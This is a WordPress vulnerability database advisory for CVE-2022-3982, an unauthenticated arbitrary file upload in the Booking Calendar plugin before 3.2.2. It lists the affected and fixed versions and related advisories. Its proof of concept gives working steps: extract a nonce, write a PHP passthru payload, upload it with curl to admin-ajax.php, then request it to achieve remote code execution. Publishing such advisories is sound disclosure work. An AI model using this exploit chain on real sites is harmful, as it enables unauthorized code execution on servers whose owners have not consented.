WordPress Plugin Vulnerabilities

Booking Calendar < 3.2.2 - Unauthenticated Arbitrary File Upload

Description

The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE

Proof of Concept

1. As an unauthenticated user, navigate to the main WordPress page
2. Extract a valid nonce from the page source (CTRL+F for "var wpdevart =", field "ajaxNonce")
3. Prepare a payload for upload:

echo '<?php passthru("id"); ?>' > /tmp/poc.php

4. Upload the payload with cURL, with the previously extracted nonce:

curl -i https://example.com/wp-admin/admin-ajax.php \
    -F 'action=wpdevart_form_ajax' \
    -F 'wpdevart_id=x' \
    -F 'wpdevart_nonce=<NONCE HERE>' \
    -F 'wpdevart_data={"wpdevart-submit":"X"}' \
    -F 'wpdevart-submit=1' \
    -F 'file=@/tmp/poc.php' 

5. Access your payload, it should have been uploaded to "/wp-content/uploads/booking_calendar/<filename>"

curl -i https://example.com/wp-content/uploads/booking_calendar/poc.php

Affects Plugins

Plugin icon
booking-calendar
Fixed in 3.2.2
Plugin icon
booking-calendar-pro-payment
Fixed in 21.1

References

CVE
CVE-2022-3982

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
4d91f3e1-4de9-46c1-b5ba-cc55b7726867

Timeline

Publicly Published
2022-11-21 (about 1 years ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2023-01-27 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
Image Manager - Shell Upload
Published
2023-08-25
Title
Folders < 2.9.3 - Authenticated (Author+) Arbitrary File Upload
Published
2014-11-30
Title
WordPress Slider Revolution Shell Upload
Published
2019-04-11
Title
Ninja Forms File Uploads Extension <= 3.0.22 - Unauthenticated Arbitrary File Upload
Published
2015-12-23
Title
NextGEN Gallery < 2.1.15 - Unrestricted File Upload